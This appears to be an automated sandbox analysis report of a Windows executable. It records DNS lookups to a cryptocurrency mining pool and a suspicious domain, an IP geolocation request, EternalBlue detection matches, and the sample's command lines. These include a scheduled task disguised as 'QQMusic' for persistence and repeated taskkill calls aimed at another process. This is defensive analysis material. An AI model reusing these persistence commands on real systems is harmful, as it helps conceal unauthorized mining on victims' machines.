Jun 14, 2024 16:39:44.046514988 CEST	1.1.1.1	192.168.2.5	0x195	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.046514988 CEST	1.1.1.1	192.168.2.5	0x195	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.046514988 CEST	1.1.1.1	192.168.2.5	0x195	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.660337925 CEST	1.1.1.1	192.168.2.5	0xf8a2	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.660337925 CEST	1.1.1.1	192.168.2.5	0xf8a2	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:44.660337925 CEST	1.1.1.1	192.168.2.5	0xf8a2	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:45.460346937 CEST	1.1.1.1	192.168.2.5	0x3587	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:45.460346937 CEST	1.1.1.1	192.168.2.5	0x3587	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:45.460346937 CEST	1.1.1.1	192.168.2.5	0x3587	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.125238895 CEST	1.1.1.1	192.168.2.5	0x116d	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.662659883 CEST	1.1.1.1	192.168.2.5	0xa3cb	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.662659883 CEST	1.1.1.1	192.168.2.5	0xa3cb	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:47.662659883 CEST	1.1.1.1	192.168.2.5	0xa3cb	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:48.189455032 CEST	1.1.1.1	192.168.2.5	0xd331	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:48.189455032 CEST	1.1.1.1	192.168.2.5	0xd331	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:48.189455032 CEST	1.1.1.1	192.168.2.5	0xd331	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:49.366173029 CEST	1.1.1.1	192.168.2.5	0x60c5	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:49.366173029 CEST	1.1.1.1	192.168.2.5	0x60c5	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:49.366173029 CEST	1.1.1.1	192.168.2.5	0x60c5	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.206908941 CEST	1.1.1.1	192.168.2.5	0x1ed0	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.206908941 CEST	1.1.1.1	192.168.2.5	0x1ed0	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.206908941 CEST	1.1.1.1	192.168.2.5	0x1ed0	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:52.851623058 CEST	1.1.1.1	192.168.2.5	0x8120	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:53.991843939 CEST	1.1.1.1	192.168.2.5	0x9abc	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:53.991843939 CEST	1.1.1.1	192.168.2.5	0x9abc	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:53.991843939 CEST	1.1.1.1	192.168.2.5	0x9abc	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:57.733269930 CEST	1.1.1.1	192.168.2.5	0x5252	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:57.733269930 CEST	1.1.1.1	192.168.2.5	0x5252	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:57.733269930 CEST	1.1.1.1	192.168.2.5	0x5252	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:39:58.607726097 CEST	1.1.1.1	192.168.2.5	0x867a	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:04.323656082 CEST	1.1.1.1	192.168.2.5	0x56b	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:10.055397034 CEST	1.1.1.1	192.168.2.5	0xf291	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:15.805620909 CEST	1.1.1.1	192.168.2.5	0xe48b	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:21.548441887 CEST	1.1.1.1	192.168.2.5	0x652a	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:27.260657072 CEST	1.1.1.1	192.168.2.5	0x72e1	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:33.043698072 CEST	1.1.1.1	192.168.2.5	0xa600	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:38.778229952 CEST	1.1.1.1	192.168.2.5	0xdbe6	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:45.024560928 CEST	1.1.1.1	192.168.2.5	0x24a5	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:50.787760973 CEST	1.1.1.1	192.168.2.5	0x9d26	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:40:56.754363060 CEST	1.1.1.1	192.168.2.5	0x573	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:02.676063061 CEST	1.1.1.1	192.168.2.5	0x8e38	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:08.473469019 CEST	1.1.1.1	192.168.2.5	0x2d73	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:15.405395985 CEST	1.1.1.1	192.168.2.5	0x73eb	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:21.222673893 CEST	1.1.1.1	192.168.2.5	0x7c2c	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:26.956490040 CEST	1.1.1.1	192.168.2.5	0x5fbf	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:32.713244915 CEST	1.1.1.1	192.168.2.5	0xd9b9	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:38.592585087 CEST	1.1.1.1	192.168.2.5	0xe21c	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:44.350460052 CEST	1.1.1.1	192.168.2.5	0xb6a8	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:50.084430933 CEST	1.1.1.1	192.168.2.5	0x55cd	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:41:55.847999096 CEST	1.1.1.1	192.168.2.5	0xae7a	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:02.627578020 CEST	1.1.1.1	192.168.2.5	0xa9a3	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:08.395011902 CEST	1.1.1.1	192.168.2.5	0xdd37	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:14.138712883 CEST	1.1.1.1	192.168.2.5	0xfaf0	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:19.881808043 CEST	1.1.1.1	192.168.2.5	0xdef8	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:25.616792917 CEST	1.1.1.1	192.168.2.5	0x1cac	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:31.378448009 CEST	1.1.1.1	192.168.2.5	0x688b	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:37.154251099 CEST	1.1.1.1	192.168.2.5	0x198d	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:42.857693911 CEST	1.1.1.1	192.168.2.5	0xa278	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:48.607587099 CEST	1.1.1.1	192.168.2.5	0xa111	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:42:54.437824011 CEST	1.1.1.1	192.168.2.5	0x131e	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:00.225452900 CEST	1.1.1.1	192.168.2.5	0xcc48	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:05.998811007 CEST	1.1.1.1	192.168.2.5	0xf917	No error (0)	nishabii.xyz	218.244.58.70	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:07.282900095 CEST	1.1.1.1	192.168.2.5	0xc345	No error (0)	auto.c3pool.org	88.198.117.174	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:07.282900095 CEST	1.1.1.1	192.168.2.5	0xc345	No error (0)	auto.c3pool.org	159.69.83.232	A (IP address)	IN (0x0001)	false
Jun 14, 2024 16:43:07.282900095 CEST	1.1.1.1	192.168.2.5	0xc345	No error (0)	auto.c3pool.org	195.201.97.156	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.5	49704	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-06-14 14:38:53 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-06-14 14:38:53 UTC	513	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Fri, 14 Jun 2024 14:38:53 GMT content-type: application/json; charset=utf-8 Content-Length: 314 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-14 14:38:53 UTC	314	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 Data Ascii: { "ip": "173.254.250.91", "hostname": "173.254.250.91.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "Amer

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.5	50015	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-06-14 14:39:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6eSwnmUbUK8dDS9&MD=PVTUpA2Z HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-14 14:39:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 7cc77693-dc21-40ac-8038-b470c622206a MS-RequestId: 6d73d2fc-066e-4987-abd9-ad758c3ddffb MS-CV: G+G1xXx6XECNkHyo.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 14 Jun 2024 14:39:18 GMT Connection: close Content-Length: 24490
2024-06-14 14:39:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-06-14 14:39:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.5	51911	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-06-14 14:39:57 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6eSwnmUbUK8dDS9&MD=PVTUpA2Z HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-06-14 14:39:58 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 3bd66b19-b4af-4151-9aef-fc309d421b30 MS-RequestId: 54a621b1-44f4-4403-94bb-6ab5b3d28719 MS-CV: qazHvDUvfE2x6CIq.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 14 Jun 2024 14:39:57 GMT Connection: close Content-Length: 30005
2024-06-14 14:39:58 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-06-14 14:39:58 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Target ID:	0
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Users\user\Desktop\x00zm3KVwb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\x00zm3KVwb.exe"
Imagebase:	0x330000
File size:	9'402'368 bytes
MD5 hash:	2CF24966A6AAD7B6ECFFE04A20EAF3DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000000.00000003.2180544900.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000000.00000003.2181302277.00000000038BE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000000.00000000.2011066839.00000000005EA000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: 00000000.00000003.2180356791.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F
Imagebase:	0xee0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 4712, Parent PID: 5060

General

Target ID:	9
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:38:58
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c taskkill /f /im syabcd.exe&&exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:38:59
Start date:	14/06/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im syabcd.exe
Imagebase:	0x900000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
